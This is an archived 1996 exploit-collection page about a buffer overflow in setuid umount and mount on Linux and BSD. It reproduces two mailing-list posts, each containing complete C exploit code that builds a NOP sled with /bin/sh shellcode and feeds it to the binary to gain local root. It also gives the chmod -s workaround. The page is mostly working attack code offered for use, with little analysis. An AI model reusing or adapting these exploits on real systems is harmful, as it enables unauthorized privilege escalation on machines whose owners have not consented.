Linux & *BSD umount holes

Summary
Description:A standard buffer overflow exists in Linux and *BSD umount
Author:bloodmask (bloodmask@mymail.com) claims to have found the vulnerability. Paulo Jorge Alves Oliveira (pjao@dux.isec.pt) wrote the freebsd/linux exploits included first.
Compromise: root (local)
Vulnerable Systems:Systems with vulnerable umount setuid (many Linux and BSD distributions)
Date:13 August 1996
Notes:If mount is fixed, try ncpmount/ncpumount and possibly wuftpd. Another mount exploit is in addendum.
Details

Exploit:


Paulo Jorge Alves Oliveira (pjao@dux.isec.pt)
Tue, 29 Oct 1996 12:38:52 +0100 

       Messages sorted by: [ date ][ thread ][ subject ][ author ] 
       Next message: Alan Cox: "Someone reminded me of something today ;)" 
       Previous message: Scriptors of DOOM: "(no subject)" 
       Next in thread: David J. Meltzer: "Re: Linux & BSD's umount exploit" 

Hello,

  there is a bug in berkeley-derived umount, which allows attacker to
get
root access (see freebsd-security for details). Here is exploit for
Linux
(tested on 2.0.XX), for BSD (tested on FreeBSD 2.1) and a quick
soluction.

Best regards, Paulo

-------------------------------------- linux_umount_exploit.c ----------
#include 
#include 
#include 
#include 
#include 
#include 

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   execl(PATH_MOUNT, "umount", buff, NULL);
}


--------------------------------------------------------------------------

  Here is a little solution --
    chmod -s /bin/umount
 This way only root can run this command.


With best regards, Paulo

--
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|                        JUST  HAVE  SOME  FUN  IN
THIS                    |
|                                 CRAZY
WORLD                              |
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| VIRTUAL PRAXIS -> CIUNIX.UC.PT 3333                                       |
| IRC-PTnet      -> IRC.ISEC.PT, CIUNIX.UC.PT, IRC.RCCN.NET, IRC.UALG.PT
|
| E-MAILs                                                                   |
|   DO DOMINIO UC :                                                         |
|       pjao@ciunix.uc.pt                                                   |
|       pjao@gemini.ci.uc.pt                                                |
|   DO DOMINIO ISEC :                                                       |
|       pjao@dux.isec.pt                                                    |
|       ircadm@irc.isec.pt (Administrador do server de IRC do ISEC)         |
| WWW                                                                       |
|   http://ciunix.uc.pt/~pjao                                               |
|   http://dux.isec.pt/~pjao                                                |
! TELEFONES                                                                 |
|   ISEC : 039-7000200 Extensao 2718                                        !
|   BIP  : 0941-7-193144                                                    !
|___________________________________________________________________________|

Addendum:


This is a multi-part message in MIME format.

--------------2F3F790C537451604439D8BF
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Greetings,

Well folks, After all the other security issues in Linux, I can't say
I'm really that shocked about this one, anyway, read the officail covin
release. After finding this one, we at covin decided it's time to put
and end to this issue, and we've begun scanning all of Linux's suid
binaries for other hints of these hidden "features", Results will be
released soon. The reason we are also releasing the exploit, an act
which may seem highly inresponsable, is due to previous expieriance that
making the exploit widely available, ussually speeds up the proccess of
patching up stupid vulnerabilities like these.


BTW, This is kind of out of topic, but I figure, there's nothing wrong
with killing two birds with one stone... Ijust noticed when installing
the latest version of the shadow suite, taken from sunsite, that it
"unpatched" the lib enviorment vulnerability on my system. I haven't had
the time to determine *HOW* it exposed my system, but it would be wise
to check up on this matter.

--------------2F3F790C537451604439D8BF
Content-Type: text/plain; charset=us-ascii; name="cvnmount.exploit"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="cvnmount.exploit"

Covin Security Releases:
(mount bufferoverflow exploit v1.0)

Tested operated systems: All current distributions of Linux

Affect: Local users on systems affected can gain overflow mounts syntax
buffer and execute a shell by overwriting the stack.

Affected binaries:
(/bin/mount and /bin/umount)

Workaround:
On all current distributions of Linux remove suid bit of /bin/mount and
/bin/umount.
[chmod -s /bin/mount;chmod -s /bin/umount]

Remarks:
For gods sake, how many more times are we gonna see this kind of problem?
It's been with Linux since it's very beggining, and it's so easy to
exploit. Similiar buffer overflow vulnerabilities have been found in
Linux distributions many times before, splitvt, dip, just to name a few
examples.


Any remarks, notes or other forms of feedback may be redirected to:
bloodmask@mymail.com
<------------------------------[ Cut here ]---------------------------------->

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include 
#include 
#include 
#include 
#include 

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
   execl(PATH_MOUNT, "mount", buff, NULL);
}

--------------2F3F790C537451604439D8BF--


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: